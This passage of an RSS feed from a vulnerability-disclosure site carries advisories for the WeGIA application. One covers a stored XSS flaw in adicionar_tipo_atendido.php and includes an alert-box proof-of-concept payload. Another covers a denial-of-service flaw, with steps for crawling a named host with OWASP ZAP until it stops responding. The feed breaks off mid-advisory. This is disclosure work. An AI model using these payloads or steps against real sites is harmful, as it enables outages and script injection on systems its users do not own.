    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-j3p8-xww6-wvqh&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-j3p8-xww6-wvqh&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/elisangela50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Elisangela Mendonça&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;contributors&amp;#34;&amp;gt;Contributors
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/diego50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Diego Castro&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/rafael-corvino/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/rafael50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/rafael-corvino/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Rafael Corvino&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 03 Mar 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-27418</title>
        <link>https://www.cvehunters.com/p/cve-2025-27418/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-27418/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-27418-cross-site-scripting-xss-stored-endpoint-adicionar_tipo_atendidophp-parameter-tipo&amp;#34;&amp;gt;CVE-2025-27418: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;adicionar_tipo_atendido.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;tipo&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-27418&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-27418&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;adicionar_tipo_atendido.php&amp;lt;/code&amp;gt; endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;tipo&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;POST /dao/adicionar_tipo_atendido.php &amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-27418-cross-site-scripting-xss-stored-endpoint-adicionar_tipo_atendidophp-parameter-tipo&amp;#34;&amp;gt;CVE-2025-27418: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;adicionar_tipo_atendido.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;tipo&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-27418&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-27418&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;adicionar_tipo_atendido.php&amp;lt;/code&amp;gt; endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;tipo&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;POST /dao/adicionar_tipo_atendido.php &amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;tipo&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly validate and sanitize user inputs in the &amp;lt;code&amp;gt;adicionar_tipo_atendido.php&amp;lt;/code&amp;gt; parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim&amp;#39;s browser, potentially compromising the user&amp;#39;s data and system.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;POC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;nb&amp;#34;&amp;gt;document&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;body&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;innerHTML&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;&amp;amp;lt;img src=x onerror=alert(&amp;amp;#34;XSS&amp;amp;#34;)&amp;amp;gt;&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-27418/402950225-75ac228d-4bf1-4206-8185-fc816d4de5fd.png&amp;#34;
	width=&amp;#34;886&amp;#34;
	height=&amp;#34;339&amp;#34;
	srcset=&amp;#34;/p/cve-2025-27418/402950225-75ac228d-4bf1-4206-8185-fc816d4de5fd_hu_8ef863f771eebaf3.png 480w, /p/cve-2025-27418/402950225-75ac228d-4bf1-4206-8185-fc816d4de5fd_hu_86adf8a0930c3439.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;261&amp;#34;
		data-flex-basis=&amp;#34;627px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-27418/402950244-748c2062-52aa-43dc-a642-d01e0cd1df43.png&amp;#34;
	width=&amp;#34;1359&amp;#34;
	height=&amp;#34;289&amp;#34;
	srcset=&amp;#34;/p/cve-2025-27418/402950244-748c2062-52aa-43dc-a642-d01e0cd1df43_hu_bc4b9ee997aed5a3.png 480w, /p/cve-2025-27418/402950244-748c2062-52aa-43dc-a642-d01e0cd1df43_hu_19686a33738656f3.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;470&amp;#34;
		data-flex-basis=&amp;#34;1128px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-ffcg-qr75-98mg&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-ffcg-qr75-98mg&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/elisangela50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Elisangela Mendonça&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;contributors&amp;#34;&amp;gt;Contributors
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/diego50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Diego Castro&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/rafael-corvino/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/rafael50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/rafael-corvino/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Rafael Corvino&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 03 Mar 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-27419</title>
        <link>https://www.cvehunters.com/p/cve-2025-27419/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-27419/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-27419-denial-of-service-dos-in-wegia-due-to-recursive-crawling-of-dynamic-urls&amp;#34;&amp;gt;CVE-2025-27419: Denial of Service (DoS) in WeGIA due to Recursive Crawling of Dynamic URLs
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-27419&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-27419&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Denial of Service (DoS) vulnerability exists in WeGIA. This vulnerability allows any unauthenticated user to cause the server to become unresponsive by performing aggressive spidering using tools like OWASP ZAP. The vulnerability is caused by recursive crawling of dynamically generated URLs and insufficient handling of large volumes of requests.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-27419-denial-of-service-dos-in-wegia-due-to-recursive-crawling-of-dynamic-urls&amp;#34;&amp;gt;CVE-2025-27419: Denial of Service (DoS) in WeGIA due to Recursive Crawling of Dynamic URLs
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-27419&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-27419&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Denial of Service (DoS) vulnerability exists in WeGIA. This vulnerability allows any unauthenticated user to cause the server to become unresponsive by performing aggressive spidering using tools like OWASP ZAP. The vulnerability is caused by recursive crawling of dynamically generated URLs and insufficient handling of large volumes of requests.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The issue occurs when the OWASP ZAP Spider scans the application and recursively crawls URLs with dynamic parameters. The Spider generates an excessive number of requests due to:
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;The presence of parameters like &amp;lt;code&amp;gt;?C=M;O=D&amp;lt;/code&amp;gt; that create multiple unique URLs.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Access to directories exposing static files, such as &amp;lt;code&amp;gt;bower_components&amp;lt;/code&amp;gt; and related assets.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;No rate limiting or restrictions on dynamically generated URLs at the server level.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The problem is exacerbated by:
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Unlimited depth crawling by the Spider.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Recursive exploration of similar URLs with slight variations.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Overwhelming the server with a high frequency of requests, which eventually causes it to stop responding.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-27419/404406419-75ee7c49-def1-4f43-ad61-9f14daab8cbd.png&amp;#34;
	width=&amp;#34;934&amp;#34;
	height=&amp;#34;715&amp;#34;
	srcset=&amp;#34;/p/cve-2025-27419/404406419-75ee7c49-def1-4f43-ad61-9f14daab8cbd_hu_7a60622cfcff99fb.png 480w, /p/cve-2025-27419/404406419-75ee7c49-def1-4f43-ad61-9f14daab8cbd_hu_31e211c362e52625.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;130&amp;#34;
		data-flex-basis=&amp;#34;313px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-27419/404406433-c926fb6d-e33b-4555-9b8d-3a3fc66a20f7.png&amp;#34;
	width=&amp;#34;911&amp;#34;
	height=&amp;#34;706&amp;#34;
	srcset=&amp;#34;/p/cve-2025-27419/404406433-c926fb6d-e33b-4555-9b8d-3a3fc66a20f7_hu_372c821c0b296966.png 480w, /p/cve-2025-27419/404406433-c926fb6d-e33b-4555-9b8d-3a3fc66a20f7_hu_e222b1ff2fb990ec.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;129&amp;#34;
		data-flex-basis=&amp;#34;309px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;This behavior was observed in multiple tests, consistently resulting in server downtime.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;POC
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Steps to reproduce the issue:
  &amp;lt;ol type=&amp;#34;1&amp;#34;&amp;gt;
    &amp;lt;li&amp;gt;Install OWASP ZAP (version 2.15.0 or higher).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Set the Spider configuration as follows:&amp;lt;/li&amp;gt;
      &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Starting Point: &amp;lt;code&amp;gt;https://comfirewall.wegia.org:8000/&amp;lt;/code&amp;gt;&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Recurse: Enabled.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Maximum Depth to Crawl: Unlimited (default: 0).&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Process Forms: Enabled.&amp;lt;/li&amp;gt;
      &amp;lt;/ul&amp;gt;
    &amp;lt;li&amp;gt;Start the Spider and monitor the server behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;After a few seconds:&amp;lt;/li&amp;gt;
      &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;The server becomes unresponsive or starts returning HTTP 5xx errors.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Logs show repeated requests to resources like &amp;lt;code&amp;gt;bower_components/ckeditor/plugins&amp;lt;/code&amp;gt; and dynamic URLs with parameters.&amp;lt;/li&amp;gt;
      &amp;lt;/ul&amp;gt;
  &amp;lt;/ol&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-27419/404406517-71f7f8e9-6b38-4632-99af-b58000820624.png&amp;#34;
	width=&amp;#34;1920&amp;#34;
	height=&amp;#34;599&amp;#34;
	srcset=&amp;#34;/p/cve-2025-27419/404406517-71f7f8e9-6b38-4632-99af-b58000820624_hu_432aae02073c59a.png 480w, /p/cve-2025-27419/404406517-71f7f8e9-6b38-4632-99af-b58000820624_hu_fa07848ed6814990.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;320&amp;#34;
		data-flex-basis=&amp;#34;769px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;video width=&amp;#34;100%&amp;#34; height=&amp;#34;100%&amp;#34; controls&amp;gt;
  &amp;lt;source src=&amp;#34;404407716-dcac56f8-3531-4769-9c50-8598a3fb2a94.mp4&amp;#34; type=&amp;#34;video/mp4&amp;#34;&amp;gt;
&amp;lt;/video&amp;gt;
&amp;lt;h2 id=&amp;#34;affected-urls&amp;#34;&amp;gt;Affected URLs
&amp;lt;/h2&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;2
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
